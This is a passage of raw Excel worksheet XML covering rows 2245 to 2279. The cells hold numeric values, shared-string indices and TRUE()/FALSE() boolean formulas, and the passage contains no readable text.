      <c r="A2245" s="1">
        <v>18613</v>
      </c>
      <c r="B2245" t="s">
        <v>0</v>
      </c>
      <c r="C2245" t="s">
        <v>22</v>
      </c>
      <c r="D2245" t="s">
        <v>2547</v>
      </c>
      <c r="E2245" t="s">
        <v>2542</v>
      </c>
      <c r="F2245">
        <v>99</v>
      </c>
      <c r="G2245" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2245" t="s">
        <v>2593</v>
      </c>
      <c r="K2245">
        <v>0</v>
      </c>
      <c r="L2245" t="s">
        <v>246</v>
      </c>
      <c r="R2245" t="s">
        <v>20</v>
      </c>
      <c r="S2245" t="s">
        <v>2544</v>
      </c>
      <c r="T2245" t="s">
        <v>7</v>
      </c>
      <c r="U2245" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2246" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2246" s="1">
        <v>18614</v>
      </c>
      <c r="B2246" t="s">
        <v>0</v>
      </c>
      <c r="C2246" t="s">
        <v>22</v>
      </c>
      <c r="D2246" t="s">
        <v>2547</v>
      </c>
      <c r="E2246" t="s">
        <v>2542</v>
      </c>
      <c r="F2246">
        <v>99</v>
      </c>
      <c r="G2246" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2246" t="s">
        <v>2594</v>
      </c>
      <c r="K2246">
        <v>0</v>
      </c>
      <c r="L2246" t="s">
        <v>246</v>
      </c>
      <c r="R2246" t="s">
        <v>20</v>
      </c>
      <c r="S2246" t="s">
        <v>2544</v>
      </c>
      <c r="T2246" t="s">
        <v>7</v>
      </c>
      <c r="U2246" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2247" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2247" s="1">
        <v>18615</v>
      </c>
      <c r="B2247" t="s">
        <v>0</v>
      </c>
      <c r="C2247" t="s">
        <v>22</v>
      </c>
      <c r="D2247" t="s">
        <v>2547</v>
      </c>
      <c r="E2247" t="s">
        <v>2542</v>
      </c>
      <c r="F2247">
        <v>99</v>
      </c>
      <c r="G2247" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2247" t="s">
        <v>2595</v>
      </c>
      <c r="K2247">
        <v>0</v>
      </c>
      <c r="L2247" t="s">
        <v>246</v>
      </c>
      <c r="R2247" t="s">
        <v>20</v>
      </c>
      <c r="S2247" t="s">
        <v>2544</v>
      </c>
      <c r="T2247" t="s">
        <v>7</v>
      </c>
      <c r="U2247" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2248" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2248" s="1">
        <v>18616</v>
      </c>
      <c r="B2248" t="s">
        <v>0</v>
      </c>
      <c r="C2248" t="s">
        <v>22</v>
      </c>
      <c r="D2248" t="s">
        <v>2547</v>
      </c>
      <c r="E2248" t="s">
        <v>2542</v>
      </c>
      <c r="F2248">
        <v>99</v>
      </c>
      <c r="G2248" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2248" t="s">
        <v>2596</v>
      </c>
      <c r="K2248">
        <v>0</v>
      </c>
      <c r="L2248" t="s">
        <v>246</v>
      </c>
      <c r="R2248" t="s">
        <v>20</v>
      </c>
      <c r="S2248" t="s">
        <v>2544</v>
      </c>
      <c r="T2248" t="s">
        <v>7</v>
      </c>
      <c r="U2248" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2249" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2249" s="1">
        <v>18617</v>
      </c>
      <c r="B2249" t="s">
        <v>0</v>
      </c>
      <c r="C2249" t="s">
        <v>22</v>
      </c>
      <c r="D2249" t="s">
        <v>2547</v>
      </c>
      <c r="E2249" t="s">
        <v>2542</v>
      </c>
      <c r="F2249">
        <v>99</v>
      </c>
      <c r="G2249" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2249" t="s">
        <v>2597</v>
      </c>
      <c r="K2249">
        <v>0</v>
      </c>
      <c r="L2249" t="s">
        <v>246</v>
      </c>
      <c r="R2249" t="s">
        <v>20</v>
      </c>
      <c r="S2249" t="s">
        <v>2544</v>
      </c>
      <c r="T2249" t="s">
        <v>7</v>
      </c>
      <c r="U2249" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2250" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2250" s="1">
        <v>18618</v>
      </c>
      <c r="B2250" t="s">
        <v>0</v>
      </c>
      <c r="C2250" t="s">
        <v>22</v>
      </c>
      <c r="D2250" t="s">
        <v>2547</v>
      </c>
      <c r="E2250" t="s">
        <v>2542</v>
      </c>
      <c r="F2250">
        <v>99</v>
      </c>
      <c r="G2250" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2250" t="s">
        <v>2598</v>
      </c>
      <c r="K2250">
        <v>0</v>
      </c>
      <c r="L2250" t="s">
        <v>246</v>
      </c>
      <c r="R2250" t="s">
        <v>20</v>
      </c>
      <c r="S2250" t="s">
        <v>2544</v>
      </c>
      <c r="T2250" t="s">
        <v>7</v>
      </c>
      <c r="U2250" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2251" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2251" s="1">
        <v>18619</v>
      </c>
      <c r="B2251" t="s">
        <v>0</v>
      </c>
      <c r="C2251" t="s">
        <v>22</v>
      </c>
      <c r="D2251" t="s">
        <v>2547</v>
      </c>
      <c r="E2251" t="s">
        <v>2542</v>
      </c>
      <c r="F2251">
        <v>99</v>
      </c>
      <c r="G2251" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2251" t="s">
        <v>2599</v>
      </c>
      <c r="K2251">
        <v>0</v>
      </c>
      <c r="L2251" t="s">
        <v>246</v>
      </c>
      <c r="R2251" t="s">
        <v>20</v>
      </c>
      <c r="S2251" t="s">
        <v>2544</v>
      </c>
      <c r="T2251" t="s">
        <v>7</v>
      </c>
      <c r="U2251" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2252" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2252" s="1">
        <v>18620</v>
      </c>
      <c r="B2252" t="s">
        <v>0</v>
      </c>
      <c r="C2252" t="s">
        <v>22</v>
      </c>
      <c r="D2252" t="s">
        <v>2547</v>
      </c>
      <c r="E2252" t="s">
        <v>2542</v>
      </c>
      <c r="F2252">
        <v>99</v>
      </c>
      <c r="G2252" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2252" t="s">
        <v>2600</v>
      </c>
      <c r="K2252">
        <v>0</v>
      </c>
      <c r="L2252" t="s">
        <v>246</v>
      </c>
      <c r="R2252" t="s">
        <v>20</v>
      </c>
      <c r="S2252" t="s">
        <v>2544</v>
      </c>
      <c r="T2252" t="s">
        <v>7</v>
      </c>
      <c r="U2252" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2253" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2253" s="1">
        <v>18621</v>
      </c>
      <c r="B2253" t="s">
        <v>0</v>
      </c>
      <c r="C2253" t="s">
        <v>22</v>
      </c>
      <c r="D2253" t="s">
        <v>2547</v>
      </c>
      <c r="E2253" t="s">
        <v>2542</v>
      </c>
      <c r="F2253">
        <v>99</v>
      </c>
      <c r="G2253" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2253" t="s">
        <v>2601</v>
      </c>
      <c r="K2253">
        <v>0</v>
      </c>
      <c r="L2253" t="s">
        <v>246</v>
      </c>
      <c r="R2253" t="s">
        <v>20</v>
      </c>
      <c r="S2253" t="s">
        <v>2544</v>
      </c>
      <c r="T2253" t="s">
        <v>7</v>
      </c>
      <c r="U2253" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2254" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2254" s="1">
        <v>18622</v>
      </c>
      <c r="B2254" t="s">
        <v>0</v>
      </c>
      <c r="C2254" t="s">
        <v>22</v>
      </c>
      <c r="D2254" t="s">
        <v>2547</v>
      </c>
      <c r="E2254" t="s">
        <v>2542</v>
      </c>
      <c r="F2254">
        <v>99</v>
      </c>
      <c r="G2254" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2254" t="s">
        <v>2602</v>
      </c>
      <c r="K2254">
        <v>0</v>
      </c>
      <c r="L2254" t="s">
        <v>246</v>
      </c>
      <c r="R2254" t="s">
        <v>20</v>
      </c>
      <c r="S2254" t="s">
        <v>2544</v>
      </c>
      <c r="T2254" t="s">
        <v>7</v>
      </c>
      <c r="U2254" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2255" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2255" s="1">
        <v>18623</v>
      </c>
      <c r="B2255" t="s">
        <v>0</v>
      </c>
      <c r="C2255" t="s">
        <v>22</v>
      </c>
      <c r="D2255" t="s">
        <v>2547</v>
      </c>
      <c r="E2255" t="s">
        <v>2542</v>
      </c>
      <c r="F2255">
        <v>99</v>
      </c>
      <c r="G2255" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2255" t="s">
        <v>2603</v>
      </c>
      <c r="K2255">
        <v>0</v>
      </c>
      <c r="L2255" t="s">
        <v>246</v>
      </c>
      <c r="R2255" t="s">
        <v>20</v>
      </c>
      <c r="S2255" t="s">
        <v>2544</v>
      </c>
      <c r="T2255" t="s">
        <v>7</v>
      </c>
      <c r="U2255" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2256" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2256" s="1">
        <v>18624</v>
      </c>
      <c r="B2256" t="s">
        <v>0</v>
      </c>
      <c r="C2256" t="s">
        <v>22</v>
      </c>
      <c r="D2256" t="s">
        <v>2547</v>
      </c>
      <c r="E2256" t="s">
        <v>2542</v>
      </c>
      <c r="F2256">
        <v>99</v>
      </c>
      <c r="G2256" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2256" t="s">
        <v>2604</v>
      </c>
      <c r="K2256">
        <v>0</v>
      </c>
      <c r="L2256" t="s">
        <v>246</v>
      </c>
      <c r="R2256" t="s">
        <v>20</v>
      </c>
      <c r="S2256" t="s">
        <v>2544</v>
      </c>
      <c r="T2256" t="s">
        <v>7</v>
      </c>
      <c r="U2256" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2257" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2257" s="1">
        <v>18625</v>
      </c>
      <c r="B2257" t="s">
        <v>0</v>
      </c>
      <c r="C2257" t="s">
        <v>22</v>
      </c>
      <c r="D2257" t="s">
        <v>2547</v>
      </c>
      <c r="E2257" t="s">
        <v>2542</v>
      </c>
      <c r="F2257">
        <v>99</v>
      </c>
      <c r="G2257" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2257" t="s">
        <v>2605</v>
      </c>
      <c r="K2257">
        <v>0</v>
      </c>
      <c r="L2257" t="s">
        <v>246</v>
      </c>
      <c r="R2257" t="s">
        <v>20</v>
      </c>
      <c r="S2257" t="s">
        <v>2544</v>
      </c>
      <c r="T2257" t="s">
        <v>7</v>
      </c>
      <c r="U2257" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2258" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2258" s="1">
        <v>18626</v>
      </c>
      <c r="B2258" t="s">
        <v>0</v>
      </c>
      <c r="C2258" t="s">
        <v>22</v>
      </c>
      <c r="D2258" t="s">
        <v>2547</v>
      </c>
      <c r="E2258" t="s">
        <v>2542</v>
      </c>
      <c r="F2258">
        <v>99</v>
      </c>
      <c r="G2258" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2258" t="s">
        <v>2606</v>
      </c>
      <c r="K2258">
        <v>0</v>
      </c>
      <c r="L2258" t="s">
        <v>246</v>
      </c>
      <c r="R2258" t="s">
        <v>20</v>
      </c>
      <c r="S2258" t="s">
        <v>2544</v>
      </c>
      <c r="T2258" t="s">
        <v>7</v>
      </c>
      <c r="U2258" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2259" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2259" s="1">
        <v>18627</v>
      </c>
      <c r="B2259" t="s">
        <v>0</v>
      </c>
      <c r="C2259" t="s">
        <v>22</v>
      </c>
      <c r="D2259" t="s">
        <v>2547</v>
      </c>
      <c r="E2259" t="s">
        <v>2542</v>
      </c>
      <c r="F2259">
        <v>99</v>
      </c>
      <c r="G2259" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2259" t="s">
        <v>2607</v>
      </c>
      <c r="K2259">
        <v>0</v>
      </c>
      <c r="L2259" t="s">
        <v>246</v>
      </c>
      <c r="R2259" t="s">
        <v>20</v>
      </c>
      <c r="S2259" t="s">
        <v>2544</v>
      </c>
      <c r="T2259" t="s">
        <v>7</v>
      </c>
      <c r="U2259" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2260" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2260" s="1">
        <v>18628</v>
      </c>
      <c r="B2260" t="s">
        <v>0</v>
      </c>
      <c r="C2260" t="s">
        <v>22</v>
      </c>
      <c r="D2260" t="s">
        <v>2547</v>
      </c>
      <c r="E2260" t="s">
        <v>2542</v>
      </c>
      <c r="F2260">
        <v>99</v>
      </c>
      <c r="G2260" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2260" t="s">
        <v>2608</v>
      </c>
      <c r="K2260">
        <v>0</v>
      </c>
      <c r="L2260" t="s">
        <v>246</v>
      </c>
      <c r="R2260" t="s">
        <v>20</v>
      </c>
      <c r="S2260" t="s">
        <v>2544</v>
      </c>
      <c r="T2260" t="s">
        <v>7</v>
      </c>
      <c r="U2260" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2261" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2261" s="1">
        <v>18629</v>
      </c>
      <c r="B2261" t="s">
        <v>0</v>
      </c>
      <c r="C2261" t="s">
        <v>22</v>
      </c>
      <c r="D2261" t="s">
        <v>2547</v>
      </c>
      <c r="E2261" t="s">
        <v>2542</v>
      </c>
      <c r="F2261">
        <v>99</v>
      </c>
      <c r="G2261" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2261" t="s">
        <v>2609</v>
      </c>
      <c r="K2261">
        <v>0</v>
      </c>
      <c r="L2261" t="s">
        <v>246</v>
      </c>
      <c r="R2261" t="s">
        <v>20</v>
      </c>
      <c r="S2261" t="s">
        <v>2544</v>
      </c>
      <c r="T2261" t="s">
        <v>7</v>
      </c>
      <c r="U2261" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2262" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2262" s="1">
        <v>18630</v>
      </c>
      <c r="B2262" t="s">
        <v>0</v>
      </c>
      <c r="C2262" t="s">
        <v>22</v>
      </c>
      <c r="D2262" t="s">
        <v>2547</v>
      </c>
      <c r="E2262" t="s">
        <v>2542</v>
      </c>
      <c r="F2262">
        <v>99</v>
      </c>
      <c r="G2262" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2262" t="s">
        <v>2610</v>
      </c>
      <c r="K2262">
        <v>0</v>
      </c>
      <c r="L2262" t="s">
        <v>246</v>
      </c>
      <c r="R2262" t="s">
        <v>20</v>
      </c>
      <c r="S2262" t="s">
        <v>2544</v>
      </c>
      <c r="T2262" t="s">
        <v>7</v>
      </c>
      <c r="U2262" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2263" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2263" s="1">
        <v>18631</v>
      </c>
      <c r="B2263" t="s">
        <v>0</v>
      </c>
      <c r="C2263" t="s">
        <v>1</v>
      </c>
      <c r="D2263" t="s">
        <v>2611</v>
      </c>
      <c r="E2263" t="s">
        <v>2542</v>
      </c>
      <c r="F2263">
        <v>74</v>
      </c>
      <c r="G2263" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2263" t="s">
        <v>2612</v>
      </c>
      <c r="K2263">
        <v>0</v>
      </c>
      <c r="L2263" t="s">
        <v>246</v>
      </c>
      <c r="R2263" t="s">
        <v>20</v>
      </c>
      <c r="S2263" t="s">
        <v>2544</v>
      </c>
      <c r="T2263" t="s">
        <v>7</v>
      </c>
      <c r="U2263" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2264" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2264" s="1">
        <v>18632</v>
      </c>
      <c r="B2264" t="s">
        <v>0</v>
      </c>
      <c r="C2264" t="s">
        <v>1</v>
      </c>
      <c r="D2264" t="s">
        <v>2547</v>
      </c>
      <c r="E2264" t="s">
        <v>2542</v>
      </c>
      <c r="F2264">
        <v>99</v>
      </c>
      <c r="G2264" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2264" t="s">
        <v>2613</v>
      </c>
      <c r="K2264">
        <v>0</v>
      </c>
      <c r="L2264" t="s">
        <v>246</v>
      </c>
      <c r="R2264" t="s">
        <v>20</v>
      </c>
      <c r="S2264" t="s">
        <v>2544</v>
      </c>
      <c r="T2264" t="s">
        <v>7</v>
      </c>
      <c r="U2264" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2265" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2265" s="1">
        <v>18633</v>
      </c>
      <c r="B2265" t="s">
        <v>0</v>
      </c>
      <c r="C2265" t="s">
        <v>1</v>
      </c>
      <c r="D2265" t="s">
        <v>2547</v>
      </c>
      <c r="E2265" t="s">
        <v>2542</v>
      </c>
      <c r="F2265">
        <v>99</v>
      </c>
      <c r="G2265" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2265" t="s">
        <v>2614</v>
      </c>
      <c r="K2265">
        <v>0</v>
      </c>
      <c r="L2265" t="s">
        <v>246</v>
      </c>
      <c r="R2265" t="s">
        <v>20</v>
      </c>
      <c r="S2265" t="s">
        <v>2544</v>
      </c>
      <c r="T2265" t="s">
        <v>7</v>
      </c>
      <c r="U2265" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2266" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2266" s="1">
        <v>18634</v>
      </c>
      <c r="B2266" t="s">
        <v>0</v>
      </c>
      <c r="C2266" t="s">
        <v>1</v>
      </c>
      <c r="D2266" t="s">
        <v>2547</v>
      </c>
      <c r="E2266" t="s">
        <v>2542</v>
      </c>
      <c r="F2266">
        <v>99</v>
      </c>
      <c r="G2266" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2266" t="s">
        <v>2615</v>
      </c>
      <c r="K2266">
        <v>0</v>
      </c>
      <c r="L2266" t="s">
        <v>246</v>
      </c>
      <c r="R2266" t="s">
        <v>20</v>
      </c>
      <c r="S2266" t="s">
        <v>2544</v>
      </c>
      <c r="T2266" t="s">
        <v>7</v>
      </c>
      <c r="U2266" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2267" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2267" s="1">
        <v>18635</v>
      </c>
      <c r="B2267" t="s">
        <v>0</v>
      </c>
      <c r="C2267" t="s">
        <v>111</v>
      </c>
      <c r="D2267" t="s">
        <v>2547</v>
      </c>
      <c r="E2267" t="s">
        <v>2542</v>
      </c>
      <c r="F2267">
        <v>99</v>
      </c>
      <c r="G2267" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2267" t="s">
        <v>2616</v>
      </c>
      <c r="K2267">
        <v>0</v>
      </c>
      <c r="L2267" t="s">
        <v>246</v>
      </c>
      <c r="R2267" t="s">
        <v>20</v>
      </c>
      <c r="S2267" t="s">
        <v>2544</v>
      </c>
      <c r="T2267" t="s">
        <v>7</v>
      </c>
      <c r="U2267" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2268" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2268" s="1">
        <v>18636</v>
      </c>
      <c r="B2268" t="s">
        <v>10</v>
      </c>
      <c r="C2268" t="s">
        <v>67</v>
      </c>
      <c r="D2268" t="s">
        <v>2542</v>
      </c>
      <c r="E2268" t="s">
        <v>2542</v>
      </c>
      <c r="F2268">
        <v>0</v>
      </c>
      <c r="G2268" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2268" t="s">
        <v>2617</v>
      </c>
      <c r="K2268">
        <v>0</v>
      </c>
      <c r="L2268" t="s">
        <v>246</v>
      </c>
      <c r="R2268" t="s">
        <v>20</v>
      </c>
      <c r="S2268" t="s">
        <v>2544</v>
      </c>
      <c r="T2268" t="s">
        <v>7</v>
      </c>
      <c r="U2268" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2269" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2269" s="1">
        <v>18637</v>
      </c>
      <c r="B2269" t="s">
        <v>10</v>
      </c>
      <c r="C2269" t="s">
        <v>67</v>
      </c>
      <c r="D2269" t="s">
        <v>2542</v>
      </c>
      <c r="E2269" t="s">
        <v>2542</v>
      </c>
      <c r="F2269">
        <v>0</v>
      </c>
      <c r="G2269" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2269" t="s">
        <v>2618</v>
      </c>
      <c r="K2269">
        <v>0</v>
      </c>
      <c r="L2269" t="s">
        <v>246</v>
      </c>
      <c r="R2269" t="s">
        <v>20</v>
      </c>
      <c r="S2269" t="s">
        <v>2544</v>
      </c>
      <c r="T2269" t="s">
        <v>7</v>
      </c>
      <c r="U2269" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2270" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2270" s="1">
        <v>18638</v>
      </c>
      <c r="B2270" t="s">
        <v>10</v>
      </c>
      <c r="C2270" t="s">
        <v>67</v>
      </c>
      <c r="D2270" t="s">
        <v>2542</v>
      </c>
      <c r="E2270" t="s">
        <v>2542</v>
      </c>
      <c r="F2270">
        <v>0</v>
      </c>
      <c r="G2270" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2270" t="s">
        <v>2619</v>
      </c>
      <c r="K2270">
        <v>0</v>
      </c>
      <c r="L2270" t="s">
        <v>246</v>
      </c>
      <c r="R2270" t="s">
        <v>20</v>
      </c>
      <c r="S2270" t="s">
        <v>2544</v>
      </c>
      <c r="T2270" t="s">
        <v>7</v>
      </c>
      <c r="U2270" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2271" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2271" s="1">
        <v>18639</v>
      </c>
      <c r="B2271" t="s">
        <v>10</v>
      </c>
      <c r="C2271" t="s">
        <v>67</v>
      </c>
      <c r="D2271" t="s">
        <v>2542</v>
      </c>
      <c r="E2271" t="s">
        <v>2542</v>
      </c>
      <c r="F2271">
        <v>0</v>
      </c>
      <c r="G2271" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2271" t="s">
        <v>2620</v>
      </c>
      <c r="K2271">
        <v>0</v>
      </c>
      <c r="L2271" t="s">
        <v>246</v>
      </c>
      <c r="R2271" t="s">
        <v>20</v>
      </c>
      <c r="S2271" t="s">
        <v>2544</v>
      </c>
      <c r="T2271" t="s">
        <v>7</v>
      </c>
      <c r="U2271" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2272" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2272" s="1">
        <v>18640</v>
      </c>
      <c r="B2272" t="s">
        <v>10</v>
      </c>
      <c r="C2272" t="s">
        <v>67</v>
      </c>
      <c r="D2272" t="s">
        <v>2542</v>
      </c>
      <c r="E2272" t="s">
        <v>2542</v>
      </c>
      <c r="F2272">
        <v>0</v>
      </c>
      <c r="G2272" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2272" t="s">
        <v>2621</v>
      </c>
      <c r="K2272">
        <v>0</v>
      </c>
      <c r="L2272" t="s">
        <v>246</v>
      </c>
      <c r="R2272" t="s">
        <v>20</v>
      </c>
      <c r="S2272" t="s">
        <v>2544</v>
      </c>
      <c r="T2272" t="s">
        <v>7</v>
      </c>
      <c r="U2272" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2273" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2273" s="1">
        <v>18641</v>
      </c>
      <c r="B2273" t="s">
        <v>10</v>
      </c>
      <c r="C2273" t="s">
        <v>67</v>
      </c>
      <c r="D2273" t="s">
        <v>2542</v>
      </c>
      <c r="E2273" t="s">
        <v>2542</v>
      </c>
      <c r="F2273">
        <v>0</v>
      </c>
      <c r="G2273" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2273" t="s">
        <v>2622</v>
      </c>
      <c r="K2273">
        <v>0</v>
      </c>
      <c r="L2273" t="s">
        <v>246</v>
      </c>
      <c r="R2273" t="s">
        <v>20</v>
      </c>
      <c r="S2273" t="s">
        <v>2544</v>
      </c>
      <c r="T2273" t="s">
        <v>7</v>
      </c>
      <c r="U2273" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2274" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2274" s="1">
        <v>18642</v>
      </c>
      <c r="B2274" t="s">
        <v>10</v>
      </c>
      <c r="C2274" t="s">
        <v>67</v>
      </c>
      <c r="D2274" t="s">
        <v>2542</v>
      </c>
      <c r="E2274" t="s">
        <v>2542</v>
      </c>
      <c r="F2274">
        <v>0</v>
      </c>
      <c r="G2274" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2274" t="s">
        <v>2623</v>
      </c>
      <c r="K2274">
        <v>0</v>
      </c>
      <c r="L2274" t="s">
        <v>246</v>
      </c>
      <c r="R2274" t="s">
        <v>20</v>
      </c>
      <c r="S2274" t="s">
        <v>2544</v>
      </c>
      <c r="T2274" t="s">
        <v>7</v>
      </c>
      <c r="U2274" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2275" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2275" s="1">
        <v>18643</v>
      </c>
      <c r="B2275" t="s">
        <v>13</v>
      </c>
      <c r="C2275" t="s">
        <v>14</v>
      </c>
      <c r="D2275" t="s">
        <v>2624</v>
      </c>
      <c r="E2275" t="s">
        <v>2625</v>
      </c>
      <c r="F2275">
        <v>5</v>
      </c>
      <c r="G2275" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J2275" t="s">
        <v>2626</v>
      </c>
      <c r="K2275">
        <v>0</v>
      </c>
      <c r="R2275" t="s">
        <v>20</v>
      </c>
      <c r="S2275" t="s">
        <v>2627</v>
      </c>
      <c r="T2275" t="s">
        <v>7</v>
      </c>
      <c r="U2275" t="s">
        <v>2628</v>
      </c>
    </row>
    <row r="2276" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2276" s="1">
        <v>18644</v>
      </c>
      <c r="B2276" t="s">
        <v>13</v>
      </c>
      <c r="C2276" t="s">
        <v>14</v>
      </c>
      <c r="D2276" t="s">
        <v>2625</v>
      </c>
      <c r="E2276" t="s">
        <v>2625</v>
      </c>
      <c r="F2276">
        <v>0</v>
      </c>
      <c r="G2276" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J2276" t="s">
        <v>2629</v>
      </c>
      <c r="K2276">
        <v>0</v>
      </c>
      <c r="R2276" t="s">
        <v>20</v>
      </c>
      <c r="S2276" t="s">
        <v>2627</v>
      </c>
      <c r="T2276" t="s">
        <v>7</v>
      </c>
      <c r="U2276" t="s">
        <v>2628</v>
      </c>
    </row>
    <row r="2277" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2277" s="1">
        <v>18645</v>
      </c>
      <c r="B2277" t="s">
        <v>0</v>
      </c>
      <c r="C2277" t="s">
        <v>22</v>
      </c>
      <c r="D2277" t="s">
        <v>2630</v>
      </c>
      <c r="E2277" t="s">
        <v>2625</v>
      </c>
      <c r="F2277">
        <v>2868835</v>
      </c>
      <c r="G2277" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2277" t="s">
        <v>2631</v>
      </c>
      <c r="K2277">
        <v>0</v>
      </c>
      <c r="L2277" t="s">
        <v>81</v>
      </c>
      <c r="R2277" t="s">
        <v>20</v>
      </c>
      <c r="S2277" t="s">
        <v>2627</v>
      </c>
      <c r="T2277" t="s">
        <v>7</v>
      </c>
      <c r="U2277" t="s">
        <v>2628</v>
      </c>
    </row>
    <row r="2278" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2278" s="1">
        <v>18646</v>
      </c>
      <c r="B2278" t="s">
        <v>0</v>
      </c>
      <c r="C2278" t="s">
        <v>22</v>
      </c>
      <c r="D2278" t="s">
        <v>2630</v>
      </c>
      <c r="E2278" t="s">
        <v>2625</v>
      </c>
      <c r="F2278">
        <v>2868835</v>
      </c>
      <c r="G2278" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2278" t="s">
        <v>2632</v>
      </c>
      <c r="K2278">
        <v>0</v>
      </c>
      <c r="L2278" t="s">
        <v>81</v>
      </c>
      <c r="R2278" t="s">
        <v>20</v>
      </c>
      <c r="S2278" t="s">
        <v>2627</v>
      </c>
      <c r="T2278" t="s">
        <v>7</v>
      </c>
      <c r="U2278" t="s">
        <v>2628</v>
      </c>
    </row>
    <row r="2279" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2279" s="1">
        <v>18647</v>
      </c>
      <c r="B2279" t="s">
        <v>0</v>
      </c>
      <c r="C2279" t="s">
        <v>78</v>
      </c>
      <c r="D2279" t="s">
        <v>2630</v>
      </c>
      <c r="E2279" t="s">
        <v>2625</v>
      </c>
      <c r="F2279">
